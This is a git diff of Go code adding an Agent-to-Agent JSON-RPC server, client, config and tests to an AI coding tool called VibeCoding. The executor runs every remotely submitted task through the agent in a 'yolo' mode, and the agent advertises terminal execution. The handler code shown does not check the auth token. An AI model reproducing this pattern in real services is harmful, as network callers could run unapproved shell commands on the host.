+	case <-time.After(time.Second):
+		t.Fatal("timeout waiting for handler")
+	}
+}
+
+func TestHandlerGetTask(t *testing.T) {
+	executor := &mockExecutor{response: "done"}
+	handler := NewHandler(executor)
+
+	// Create a task first
+	task := handler.GetTaskStore().Create("test_task")
+	task.State = TaskStateCompleted
+	handler.GetTaskStore().Update(task)
+
+	// Get task via JSON-RPC
+	params, _ := json.Marshal(map[string]string{"task_id": "test_task"})
+	reqBody := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "task/get",
+		Params:  params,
+		ID:      2,
+	}
+	body, _ := json.Marshal(reqBody)
+
+	req := httptest.NewRequest("POST", "/a2a", strings.NewReader(string(body)))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+
+	handler.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	var resp JSONRPCResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.Error != nil {
+		t.Errorf("unexpected error: %s", resp.Error.Message)
+	}
+}
+
+func TestHandlerCancelTask(t *testing.T) {
+	executor := &mockExecutor{response: "done"}
+	handler := NewHandler(executor)
+
+	// Create a working task
+	task := handler.GetTaskStore().Create("cancel_task")
+	task.State = TaskStateWorking
+	handler.GetTaskStore().Update(task)
+
+	// Cancel via JSON-RPC
+	params, _ := json.Marshal(map[string]string{"task_id": "cancel_task"})
+	reqBody := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "task/cancel",
+		Params:  params,
+		ID:      3,
+	}
+	body, _ := json.Marshal(reqBody)
+
+	req := httptest.NewRequest("POST", "/a2a", strings.NewReader(string(body)))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+
+	handler.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	// Verify task is canceled
+	task = handler.GetTaskStore().Get("cancel_task")
+	if task.State != TaskStateCanceled {
+		t.Errorf("expected canceled, got %s", task.State)
+	}
+}
+
+func TestHandlerInvalidJSON(t *testing.T) {
+	executor := &mockExecutor{}
+	handler := NewHandler(executor)
+
+	req := httptest.NewRequest("POST", "/a2a", strings.NewReader("not json"))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+
+	handler.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	var resp JSONRPCResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.Error == nil {
+		t.Error("expected error for invalid JSON")
+	}
+	if resp.Error.Code != -32700 {
+		t.Errorf("expected error code -32700, got %d", resp.Error.Code)
+	}
+}
+
+func TestHandlerInvalidMethod(t *testing.T) {
+	executor := &mockExecutor{}
+	handler := NewHandler(executor)
+
+	reqBody := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "unknown/method",
+		ID:      1,
+	}
+	body, _ := json.Marshal(reqBody)
+
+	req := httptest.NewRequest("POST", "/a2a", strings.NewReader(string(body)))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+
+	handler.ServeHTTP(w, req)
+
+	var resp JSONRPCResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.Error == nil {
+		t.Error("expected error for unknown method")
+	}
+	if resp.Error.Code != -32601 {
+		t.Errorf("expected error code -32601, got %d", resp.Error.Code)
+	}
+}
+
+func TestHandlerInvalidJSONRPCVersion(t *testing.T) {
+	executor := &mockExecutor{}
+	handler := NewHandler(executor)
+
+	reqBody := JSONRPCRequest{
+		JSONRPC: "1.0",
+		Method:  "message/send",
+		ID:      1,
+	}
+	body, _ := json.Marshal(reqBody)
+
+	req := httptest.NewRequest("POST", "/a2a", strings.NewReader(string(body)))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+
+	handler.ServeHTTP(w, req)
+
+	var resp JSONRPCResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.Error == nil {
+		t.Error("expected error for invalid jsonrpc version")
+	}
+	if resp.Error.Code != -32600 {
+		t.Errorf("expected error code -32600, got %d", resp.Error.Code)
+	}
+}
+
+func TestHandlerMethodNotAllowed(t *testing.T) {
+	executor := &mockExecutor{}
+	handler := NewHandler(executor)
+
+	req := httptest.NewRequest("GET", "/a2a", nil)
+	w := httptest.NewRecorder()
+
+	handler.ServeHTTP(w, req)
+
+	if w.Code != http.StatusMethodNotAllowed {
+		t.Errorf("expected 405, got %d", w.Code)
+	}
+}
+
+func TestSubscribeUnsubscribe(t *testing.T) {
+	executor := &mockExecutor{}
+	handler := NewHandler(executor)
+
+	ch := handler.Subscribe("task_1")
+	if ch == nil {
+		t.Fatal("expected channel")
+	}
+
+	// Send event
+	handler.broadcast("task_1", TaskEvent{
+		TaskID: "task_1",
+		State:  TaskStateWorking,
+	})
+
+	select {
+	case ev := <-ch:
+		if ev.TaskID != "task_1" {
+			t.Errorf("expected task_1, got %s", ev.TaskID)
+		}
+	case <-time.After(time.Second):
+		t.Error("timeout waiting for event")
+	}
+
+	// Unsubscribe
+	handler.Unsubscribe("task_1", ch)
+}
+
+func TestClientSendMessage(t *testing.T) {
+	// Create mock server
+	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.URL.Path != "/a2a" {
+			http.Error(w, "not found", http.StatusNotFound)
+			return
+		}
+
+		var req JSONRPCRequest
+		json.NewDecoder(r.Body).Decode(&req)
+
+		task := &Task{
+			ID:    "task_123",
+			State: TaskStateCompleted,
+			Artifacts: []Artifact{
+				{Name: "response", Parts: []MessagePart{{Type: "text", Text: "Hello!"}}},
+			},
+		}
+
+		json.NewEncoder(w).Encode(JSONRPCResponse{
+			JSONRPC: "2.0",
+			Result:  task,
+			ID:      req.ID,
+		})
+	}))
+	defer server.Close()
+
+	client := NewClient(server.URL, "")
+	task, err := client.SendMessage(context.Background(), "", &Message{
+		Role:  "user",
+		Parts: []MessagePart{{Type: "text", Text: "hello"}},
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if task.ID != "task_123" {
+		t.Errorf("expected task_123, got %s", task.ID)
+	}
+	if task.State != TaskStateCompleted {
+		t.Errorf("expected completed, got %s", task.State)
+	}
+}
+
+func TestClientGetAgentCard(t *testing.T) {
+	card := DefaultAgentCard("0.1.27", "http://localhost:8093")
+	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.URL.Path != "/.well-known/agent.json" {
+			http.Error(w, "not found", http.StatusNotFound)
+			return
+		}
+		json.NewEncoder(w).Encode(card)
+	}))
+	defer server.Close()
+
+	client := NewClient(server.URL, "")
+	got, err := client.GetAgentCard(context.Background())
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if got.Name != "VibeCoding" {
+		t.Errorf("expected VibeCoding, got %s", got.Name)
+	}
+}
+
+func TestClientError(t *testing.T) {
+	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		json.NewEncoder(w).Encode(JSONRPCResponse{
+			JSONRPC: "2.0",
+			Error:   &JSONRPCError{Code: -32000, Message: "task not found"},
+			ID:      1,
+		})
+	}))
+	defer server.Close()
+
+	client := NewClient(server.URL, "")
+	_, err := client.SendMessage(context.Background(), "", &Message{
+		Role:  "user",
+		Parts: []MessagePart{{Type: "text", Text: "hello"}},
+	})
+	if err == nil {
+		t.Error("expected error")
+	}
+	if !strings.Contains(err.Error(), "task not found") {
+		t.Errorf("expected 'task not found' in error, got: %v", err)
+	}
+}
+
+func TestClientWithAuth(t *testing.T) {
+	var gotToken string
+	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		gotToken = r.Header.Get("Authorization")
+		task := &Task{ID: "t1", State: TaskStateCompleted}
+		json.NewEncoder(w).Encode(JSONRPCResponse{JSONRPC: "2.0", Result: task, ID: 1})
+	}))
+	defer server.Close()
+
+	client := NewClient(server.URL, "test-token")
+	_, err := client.SendMessage(context.Background(), "", &Message{
+		Role:  "user",
+		Parts: []MessagePart{{Type: "text", Text: "hello"}},
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if gotToken != "Bearer test-token" {
+		t.Errorf("expected 'Bearer test-token', got '%s'", gotToken)
+	}
+}
+
+// mockExecutor implements AgentExecutor for testing.
+type mockExecutor struct {
+	response string
+	err      error
+}
+
+func (m *mockExecutor) ExecuteTask(ctx context.Context, task *Task, msg *Message) (<-chan TaskEvent, error) {
+	if m.err != nil {
+		return nil, m.err
+	}
+
+	ch := make(chan TaskEvent, 10)
+	go func() {
+		defer close(ch)
+		ch <- TaskEvent{
+			TaskID:    task.ID,
+			State:     TaskStateWorking,
+			Message:   &Message{Role: "agent", Parts: []MessagePart{{Type: "text", Text: m.response}}},
+			Timestamp: time.Now(),
+		}
+		ch <- TaskEvent{
+			TaskID: task.ID,
+			State:  TaskStateCompleted,
+			Artifact: &Artifact{
+				Name:  "response",
+				Parts: []MessagePart{{Type: "text", Text: m.response}},
+			},
+			Timestamp: time.Now(),
+		}
+	}()
+
+	return ch, nil
+}
+
+type blockingExecutor struct {
+	started chan struct{}
+	release chan struct{}
+}
+
+func (b *blockingExecutor) ExecuteTask(ctx context.Context, task *Task, msg *Message) (<-chan TaskEvent, error) {
+	ch := make(chan TaskEvent, 1)
+	go func() {
+		defer close(ch)
+		close(b.started)
+		select {
+		case <-b.release:
+		case <-ctx.Done():
+			return
+		}
+		ch <- TaskEvent{
+			TaskID:    task.ID,
+			State:     TaskStateCompleted,
+			Timestamp: time.Now(),
+		}
+	}()
+	return ch, nil
+}
diff --git a/internal/a2a/agent_card.go b/internal/a2a/agent_card.go
new file mode 100644
index 0000000..313a905
--- /dev/null
+++ b/internal/a2a/agent_card.go
@@ -0,0 +1,72 @@
+package a2a
+
+import (
+	"encoding/json"
+	"net/http"
+)
+
+// AgentCard represents the A2A Agent Card (/.well-known/agent.json).
+type AgentCard struct {
+	Name         string       `json:"name"`
+	Description  string       `json:"description"`
+	URL          string       `json:"url"`
+	Version      string       `json:"version"`
+	Capabilities Capabilities `json:"capabilities"`
+	Skills       []Skill      `json:"skills"`
+}
+
+// Capabilities describes what the agent can do.
+type Capabilities struct {
+	Streaming         bool `json:"streaming"`
+	PushNotifications bool `json:"pushNotifications"`
+}
+
+// Skill describes a specific capability.
+type Skill struct {
+	ID          string `json:"id"`
+	Name        string `json:"name"`
+	Description string `json:"description"`
+}
+
+// DefaultAgentCard returns the default Agent Card for VibeCoding.
+func DefaultAgentCard(version, serverURL string) *AgentCard {
+	return &AgentCard{
+		Name:        "VibeCoding",
+		Description: "AI coding assistant with file editing, terminal, and search capabilities",
+		URL:         serverURL + "/a2a",
+		Version:     version,
+		Capabilities: Capabilities{
+			Streaming:         true,
+			PushNotifications: false,
+		},
+		Skills: []Skill{
+			{
+				ID:          "code-edit",
+				Name:        "Code Editing",
+				Description: "Read, write, and edit code files with precise text replacement",
+			},
+			{
+				ID:          "terminal",
+				Name:        "Terminal Execution",
+				Description: "Execute shell commands, run tests, build projects",
+			},
+			{
+				ID:          "code-search",
+				Name:        "Code Search",
+				Description: "Search codebases with ripgrep and fd",
+			},
+		},
+	}
+}
+
+// HandleAgentCard serves the Agent Card at /.well-known/agent.json.
+func HandleAgentCard(card *AgentCard) http.HandlerFunc {
+	return func(w http.ResponseWriter, r *http.Request) {
+		if r.Method != http.MethodGet {
+			http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+			return
+		}
+		w.Header().Set("Content-Type", "application/json")
+		json.NewEncoder(w).Encode(card)
+	}
+}
diff --git a/internal/a2a/client.go b/internal/a2a/client.go
new file mode 100644
index 0000000..bdd8345
--- /dev/null
+++ b/internal/a2a/client.go
@@ -0,0 +1,228 @@
+package a2a
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"time"
+)
+
+// Client is an A2A protocol client for sending tasks to other A2A servers.
+type Client struct {
+	httpClient *http.Client
+	baseURL    string
+	authToken  string
+}
+
+// NewClient creates a new A2A client.
+func NewClient(baseURL, authToken string) *Client {
+	return &Client{
+		httpClient: &http.Client{Timeout: 300 * time.Second},
+		baseURL:    baseURL,
+		authToken:  authToken,
+	}
+}
+
+// SendMessage sends a message to an A2A server (sync response).
+func (c *Client) SendMessage(ctx context.Context, taskID string, msg *Message) (*Task, error) {
+	req := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "message/send",
+		Params: mustMarshal(SendMessageParams{
+			TaskID:  taskID,
+			Message: msg,
+		}),
+		ID: 1,
+	}
+
+	var result Task
+	if err := c.doRPC(ctx, &req, &result); err != nil {
+		return nil, err
+	}
+	return &result, nil
+}
+
+// SendMessageStream sends a message and returns SSE events via channel.
+func (c *Client) SendMessageStream(ctx context.Context, taskID string, msg *Message) (<-chan TaskEvent, error) {
+	req := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "message/send",
+		Params: mustMarshal(SendMessageParams{
+			TaskID:  taskID,
+			Message: msg,
+		}),
+		ID: 1,
+	}
+
+	body, _ := json.Marshal(req)
+	httpReq, err := http.NewRequestWithContext(ctx, "POST", c.baseURL+"/a2a", bytes.NewReader(body))
+	if err != nil {
+		return nil, err
+	}
+	httpReq.Header.Set("Content-Type", "application/json")
+	httpReq.Header.Set("Accept", "text/event-stream")
+	if c.authToken != "" {
+		httpReq.Header.Set("Authorization", "Bearer "+c.authToken)
+	}
+
+	resp, err := c.httpClient.Do(httpReq)
+	if err != nil {
+		return nil, fmt.Errorf("a2a request: %w", err)
+	}
+
+	if resp.StatusCode != http.StatusOK {
+		resp.Body.Close()
+		return nil, fmt.Errorf("a2a request: status %d", resp.StatusCode)
+	}
+
+	ch := make(chan TaskEvent, 100)
+	go func() {
+		defer close(ch)
+		defer resp.Body.Close()
+		c.readSSE(ctx, resp.Body, ch)
+	}()
+
+	return ch, nil
+}
+
+// GetTask gets the current state of a task.
+func (c *Client) GetTask(ctx context.Context, taskID string) (*Task, error) {
+	req := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "task/get",
+		Params:  mustMarshal(map[string]string{"task_id": taskID}),
+		ID:      2,
+	}
+
+	var result Task
+	if err := c.doRPC(ctx, &req, &result); err != nil {
+		return nil, err
+	}
+	return &result, nil
+}
+
+// CancelTask cancels a running task.
+func (c *Client) CancelTask(ctx context.Context, taskID string) (*Task, error) {
+	req := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "task/cancel",
+		Params:  mustMarshal(map[string]string{"task_id": taskID}),
+		ID:      3,
+	}
+
+	var result Task
+	if err := c.doRPC(ctx, &req, &result); err != nil {
+		return nil, err
+	}
+	return &result, nil
+}
+
+// GetAgentCard retrieves the Agent Card from the server.
+func (c *Client) GetAgentCard(ctx context.Context) (*AgentCard, error) {
+	httpReq, err := http.NewRequestWithContext(ctx, "GET", c.baseURL+"/.well-known/agent.json", nil)
+	if err != nil {
+		return nil, err
+	}
+
+	resp, err := c.httpClient.Do(httpReq)
+	if err != nil {
+		return nil, fmt.Errorf("get agent card: %w", err)
+	}
+	defer resp.Body.Close()
+
+	if resp.StatusCode != http.StatusOK {
+		return nil, fmt.Errorf("get agent card: status %d", resp.StatusCode)
+	}
+
+	var card AgentCard
+	if err := json.NewDecoder(resp.Body).Decode(&card); err != nil {
+		return nil, fmt.Errorf("decode agent card: %w", err)
+	}
+	return &card, nil
+}
+
+// doRPC performs a JSON-RPC call and decodes the result.
+func (c *Client) doRPC(ctx context.Context, req *JSONRPCRequest, result any) error {
+	body, _ := json.Marshal(req)
+	httpReq, err := http.NewRequestWithContext(ctx, "POST", c.baseURL+"/a2a", bytes.NewReader(body))
+	if err != nil {
+		return err
+	}
+	httpReq.Header.Set("Content-Type", "application/json")
+	if c.authToken != "" {
+		httpReq.Header.Set("Authorization", "Bearer "+c.authToken)
+	}
+
+	resp, err := c.httpClient.Do(httpReq)
+	if err != nil {
+		return fmt.Errorf("a2a rpc: %w", err)
+	}
+	defer resp.Body.Close()
+
+	var rpcResp JSONRPCResponse
+	if err := json.NewDecoder(resp.Body).Decode(&rpcResp); err != nil {
+		return fmt.Errorf("decode response: %w", err)
+	}
+
+	if rpcResp.Error != nil {
+		return fmt.Errorf("a2a error %d: %s", rpcResp.Error.Code, rpcResp.Error.Message)
+	}
+
+	if result != nil && rpcResp.Result != nil {
+		data, _ := json.Marshal(rpcResp.Result)
+		return json.Unmarshal(data, result)
+	}
+	return nil
+}
+
+// readSSE reads SSE events from the response body.
+func (c *Client) readSSE(ctx context.Context, body io.Reader, ch chan<- TaskEvent) {
+	buf := make([]byte, 4096)
+	var remaining []byte
+
+	for {
+		select {
+		case <-ctx.Done():
+			return
+		default:
+		}
+
+		n, err := body.Read(buf)
+		if n > 0 {
+			remaining = append(remaining, buf[:n]...)
+			// Parse SSE lines
+			for {
+				idx := bytes.Index(remaining, []byte("\n\n"))
+				if idx < 0 {
+					break
+				}
+				line := remaining[:idx]
+				remaining = remaining[idx+2:]
+
+				// Parse "data: ..."
+				if bytes.HasPrefix(line, []byte("data: ")) {
+					data := line[6:]
+					var event TaskEvent
+					if err := json.Unmarshal(data, &event); err == nil {
+						select {
+						case ch <- event:
+						case <-ctx.Done():
+							return
+						}
+					}
+				}
+			}
+		}
+		if err != nil {
+			return
+		}
+	}
+}
+
+func mustMarshal(v any) json.RawMessage {
+	data, _ := json.Marshal(v)
+	return data
+}
diff --git a/internal/a2a/config.go b/internal/a2a/config.go
new file mode 100644
index 0000000..4d59bd4
--- /dev/null
+++ b/internal/a2a/config.go
@@ -0,0 +1,105 @@
+// Package a2a implements the A2A (Agent-to-Agent) protocol server.
+// It provides a JSON-RPC 2.0 endpoint for other agents to send tasks to VibeCoding.
+// Supports both standalone mode (vibecoding a2a start) and integration mode (hermes + a2a.enabled).
+package a2a
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+)
+
+// Config holds A2A server configuration.
+type Config struct {
+	Enabled   bool          `json:"enabled"`
+	Port      int           `json:"port"`
+	Host      string        `json:"host"`
+	AuthToken string        `json:"auth_token,omitempty"`
+	WorkDir   string        `json:"work_dir,omitempty"`
+	AgentCard *AgentCardCfg `json:"agent_card,omitempty"`
+}
+
+// AgentCardCfg holds customizable Agent Card fields.
+type AgentCardCfg struct {
+	Name        string `json:"name,omitempty"`
+	Description string `json:"description,omitempty"`
+	Version     string `json:"version,omitempty"`
+}
+
+// DefaultConfig returns default A2A configuration.
+func DefaultConfig() *Config {
+	return &Config{
+		Enabled: false,
+		Port:    8093,
+		Host:    "127.0.0.1",
+	}
+}
+
+// ConfigPath returns the path to the global a2a.json.
+func ConfigPath() string {
+	return filepath.Join(config.ConfigDir(), "a2a.json")
+}
+
+// ProjectConfigPath returns the path to the project-level .vibe/a2a.json.
+func ProjectConfigPath() string {
+	return filepath.Join(".vibe", "a2a.json")
+}
+
+// GetListenAddr returns the listen address.
+func (c *Config) GetListenAddr() string {
+	return fmt.Sprintf("%s:%d", c.Host, c.Port)
+}
+
+// GetWorkDir returns the resolved working directory.
+func (c *Config) GetWorkDir() string {
+	if c.WorkDir != "" && c.WorkDir != "." {
+		return c.WorkDir
+	}
+	cwd, err := os.Getwd()
+	if err != nil {
+		return "."
+	}
+	return cwd
+}
+
+// SaveConfig writes the config to a JSON file.
+func SaveConfig(path string, cfg *Config) error {
+	if err := os.MkdirAll(filepath.Dir(path), 0700); err != nil {
+		return fmt.Errorf("create config directory: %w", err)
+	}
+	data, err := json.MarshalIndent(cfg, "", "  ")
+	if err != nil {
+		return fmt.Errorf("marshal a2a config: %w", err)
+	}
+	return os.WriteFile(path, data, 0600)
+}
+
+// InitA2AConfig creates the a2a.json template at the default location.
+// Returns the file path. If force is false and the file already exists, returns an error.
+func InitA2AConfig(force bool) (string, error) {
+	path := ConfigPath()
+	if !force {
+		if _, err := os.Stat(path); err == nil {
+			return path, fmt.Errorf("a2a.json already exists: %s", path)
+		}
+	}
+	cfg := DefaultConfig()
+	cfg.AuthToken = "change-me-to-a-random-secret"
+	home, _ := os.UserHomeDir()
+	if home == "" {
+		home = "/home/user"
+	}
+	cfg.WorkDir = filepath.Join(home, "projects")
+	cfg.AgentCard = &AgentCardCfg{
+		Name:        "My A2A Agent",
+		Description: "An AI coding agent accessible via A2A protocol",
+	}
+
+	if err := SaveConfig(path, cfg); err != nil {
+		return "", err
+	}
+	return path, nil
+}
diff --git a/internal/a2a/executor.go b/internal/a2a/executor.go
new file mode 100644
index 0000000..1bf4507
--- /dev/null
+++ b/internal/a2a/executor.go
@@ -0,0 +1,115 @@
+package a2a
+
+import (
+	"context"
+	"fmt"
+	"strings"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/agent"
+)
+
+// DefaultExecutor implements AgentExecutor by running tasks through the agent loop.
+type DefaultExecutor struct {
+	agentFactory AgentFactory
+}
+
+// AgentFactory creates agent instances for A2A task execution.
+type AgentFactory interface {
+	CreateForA2A(workDir string, mode string) (*agent.Agent, error)
+}
+
+// NewDefaultExecutor creates a new default executor.
+func NewDefaultExecutor(factory AgentFactory) *DefaultExecutor {
+	return &DefaultExecutor{agentFactory: factory}
+}
+
+// ExecuteTask runs an A2A task through the agent loop.
+func (e *DefaultExecutor) ExecuteTask(ctx context.Context, task *Task, msg *Message) (<-chan TaskEvent, error) {
+	// Extract text from message parts
+	var userInput string
+	for _, part := range msg.Parts {
+		if part.Type == "text" && part.Text != "" {
+			userInput = part.Text
+			break
+		}
+	}
+	if userInput == "" {
+		return nil, fmt.Errorf("no text content in message")
+	}
+
+	// Create agent
+	a, err := e.agentFactory.CreateForA2A("", "yolo")
+	if err != nil {
+		return nil, fmt.Errorf("create agent: %w", err)
+	}
+
+	// Run agent
+	agentCh := a.Run(ctx, userInput)
+
+	// Convert agent events to A2A task events
+	taskCh := make(chan TaskEvent, 100)
+	go func() {
+		defer close(taskCh)
+
+		var response strings.Builder
+		for ev := range agentCh {
+			now := time.Now()
+			switch ev.Type {
+			case agent.EventTextDelta:
+				response.WriteString(ev.TextDelta)
+				taskCh <- TaskEvent{
+					TaskID:    task.ID,
+					State:     TaskStateWorking,
+					Message:   &Message{Role: "agent", Parts: []MessagePart{{Type: "text", Text: ev.TextDelta}}},
+					Timestamp: now,
+				}
+
+			case agent.EventDone:
+				taskCh <- TaskEvent{
+					TaskID: task.ID,
+					State:  TaskStateCompleted,
+					Artifact: &Artifact{
+						Name:  "response",
+						Parts: []MessagePart{{Type: "text", Text: response.String()}},
+					},
+					Timestamp: now,
+				}
+
+			case agent.EventError:
+				errMsg := "unknown error"
+				if ev.Error != nil {
+					errMsg = ev.Error.Error()
+				}
+				taskCh <- TaskEvent{
+					TaskID:    task.ID,
+					State:     TaskStateFailed,
+					Error:     &TaskError{Code: -32000, Message: errMsg},
+					Timestamp: now,
+				}
+
+			case agent.EventToolCall, agent.EventToolExecutionStart, agent.EventToolExecutionEnd:
+				toolName := ev.ToolName
+				if toolName == "" && ev.ToolCall != nil {
+					toolName = ev.ToolCall.Name
+				}
+				if toolName != "" {
+					taskCh <- TaskEvent{
+						TaskID: task.ID,
+						State:  TaskStateWorking,
+						Message: &Message{
+							Role: "agent",
+							Parts: []MessagePart{{
+								Type: "text",
+								Text: fmt.Sprintf("[tool: %s]", toolName),
+							}},
+						},
+						Timestamp: now,
+					}
+				}
+			}
+		}
+	}()
+
+	return taskCh, nil
+}
diff --git a/internal/a2a/handler.go b/internal/a2a/handler.go
new file mode 100644
index 0000000..584683c
--- /dev/null
+++ b/internal/a2a/handler.go
@@ -0,0 +1,337 @@
+package a2a
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"strings"
+	"sync"
+	"time"
+)
+
+// JSONRPCRequest represents a JSON-RPC 2.0 request.
+type JSONRPCRequest struct {
+	JSONRPC string          `json:"jsonrpc"`
+	Method  string          `json:"method"`
+	Params  json.RawMessage `json:"params,omitempty"`
+	ID      any             `json:"id"`
+}
+
+// JSONRPCResponse represents a JSON-RPC 2.0 response.
+type JSONRPCResponse struct {
+	JSONRPC string        `json:"jsonrpc"`
+	Result  any           `json:"result,omitempty"`
+	Error   *JSONRPCError `json:"error,omitempty"`
+	ID      any           `json:"id"`
+}
+
+// JSONRPCError represents a JSON-RPC 2.0 error.
+type JSONRPCError struct {
+	Code    int    `json:"code"`
+	Message string `json:"message"`
+}
+
+// SendMessageParams represents the params for message/send.
+type SendMessageParams struct {
+	TaskID  string   `json:"task_id,omitempty"`
+	Message *Message `json:"message"`
+}
+
+// AgentExecutor processes A2A tasks by running them through the agent loop.
+type AgentExecutor interface {
+	ExecuteTask(ctx context.Context, task *Task, msg *Message) (<-chan TaskEvent, error)
+}
+
+// Handler handles A2A JSON-RPC requests.
+type Handler struct {
+	taskStore   *TaskStore
+	executor    AgentExecutor
+	mu          sync.RWMutex
+	subscribers map[string][]chan TaskEvent
+}
+
+// NewHandler creates a new A2A handler.
+func NewHandler(executor AgentExecutor) *Handler {
+	return &Handler{
+		taskStore:   NewTaskStore(),
+		executor:    executor,
+		subscribers: make(map[string][]chan TaskEvent),
+	}
+}
+
+// GetTaskStore returns the task store.
+func (h *Handler) GetTaskStore() *TaskStore {
+	return h.taskStore
+}
+
+// ServeHTTP handles A2A JSON-RPC requests at /a2a.
+func (h *Handler) ServeHTTP(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodPost {
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+		return
+	}
+
+	var req JSONRPCRequest
+	if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
+		h.writeError(w, nil, -32700, "Parse error")
+		return
+	}
+
+	if req.JSONRPC != "2.0" {
+		h.writeError(w, req.ID, -32600, "Invalid Request: jsonrpc must be \"2.0\"")
+		return
+	}
+
+	isSSE := strings.Contains(r.Header.Get("Accept"), "text/event-stream")
+
+	switch req.Method {
+	case "message/send":
+		h.handleSendMessage(w, r, &req, isSSE)
+	case "task/get":
+		h.handleGetTask(w, &req)
+	case "task/cancel":
+		h.handleCancelTask(w, &req)
+	default:
+		h.writeError(w, req.ID, -32601, "Method not found: "+req.Method)
+	}
+}
+
+// handleSendMessage processes message/send.
+func (h *Handler) handleSendMessage(w http.ResponseWriter, r *http.Request, req *JSONRPCRequest, isSSE bool) {
+	var params SendMessageParams
+	if err := json.Unmarshal(req.Params, &params); err != nil {
+		h.writeError(w, req.ID, -32602, "Invalid params: "+err.Error())
+		return
+	}
+	if params.Message == nil {
+		h.writeError(w, req.ID, -32602, "Invalid params: message is required")
+		return
+	}
+
+	// Create or get task
+	var task *Task
+	if params.TaskID != "" {
+		task = h.taskStore.Get(params.TaskID)
+		if task == nil {
+			h.writeError(w, req.ID, -32000, "Task not found: "+params.TaskID)
+			return
+		}
+	} else {
+		task = h.taskStore.Create(newTaskID())
+	}
+
+	task.Message = params.Message
+	task.State = TaskStateWorking
+	h.taskStore.Update(task)
+
+	if isSSE {
+		h.streamResponse(w, r, task, params.Message)
+	} else {
+		h.syncResponse(w, r, task, params.Message, req.ID)
+	}
+}
+
+// syncResponse processes the task synchronously.
+func (h *Handler) syncResponse(w http.ResponseWriter, r *http.Request, task *Task, msg *Message, reqID any) {
+	eventCh, err := h.executor.ExecuteTask(r.Context(), task, msg)
+	if err != nil {
+		task.State = TaskStateFailed
+		task.Error = &TaskError{Code: -32000, Message: err.Error()}
+		h.taskStore.Update(task)
+		h.writeError(w, reqID, -32000, err.Error())
+		return
+	}
+
+	var lastEvent TaskEvent
+	for ev := range eventCh {
+		lastEvent = ev
+		h.broadcast(task.ID, ev)
+	}
+
+	task.State = lastEvent.State
+	if lastEvent.Error != nil {
+		task.Error = lastEvent.Error
+	}
+	if lastEvent.Artifact != nil {
+		task.Artifacts = append(task.Artifacts, *lastEvent.Artifact)
+	}
+	h.taskStore.Update(task)
+
+	w.Header().Set("Content-Type", "application/json")
+	json.NewEncoder(w).Encode(JSONRPCResponse{JSONRPC: "2.0", Result: task, ID: reqID})
+}
+
+// streamResponse processes the task with SSE streaming.
+func (h *Handler) streamResponse(w http.ResponseWriter, r *http.Request, task *Task, msg *Message) {
+	flusher, ok := w.(http.Flusher)
+	if !ok {
+		http.Error(w, "streaming not supported", http.StatusInternalServerError)
+		return
+	}
+
+	w.Header().Set("Content-Type", "text/event-stream")
+	w.Header().Set("Cache-Control", "no-cache")
+	w.Header().Set("Connection", "keep-alive")
+
+	eventCh, err := h.executor.ExecuteTask(r.Context(), task, msg)
+	if err != nil {
+		task.State = TaskStateFailed
+		task.Error = &TaskError{Code: -32000, Message: err.Error()}
+		h.taskStore.Update(task)
+		h.writeSSE(w, flusher, TaskEvent{TaskID: task.ID, State: TaskStateFailed, Error: task.Error, Timestamp: time.Now()})
+		return
+	}
+
+	for ev := range eventCh {
+		h.writeSSE(w, flusher, ev)
+		h.broadcast(task.ID, ev)
+		if ev.State == TaskStateCompleted || ev.State == TaskStateFailed {
+			task.State = ev.State
+			if ev.Error != nil {
+				task.Error = ev.Error
+			}
+			if ev.Artifact != nil {
+				task.Artifacts = append(task.Artifacts, *ev.Artifact)
+			}
+			h.taskStore.Update(task)
+		}
+	}
+}
+
+// handleGetTask returns the current state of a task.
+func (h *Handler) handleGetTask(w http.ResponseWriter, req *JSONRPCRequest) {
+	var params struct {
+		TaskID string `json:"task_id"`
+	}
+	if err := json.Unmarshal(req.Params, &params); err != nil {
+		h.writeError(w, req.ID, -32602, "Invalid params: "+err.Error())
+		return
+	}
+	task := h.taskStore.Get(params.TaskID)
+	if task == nil {
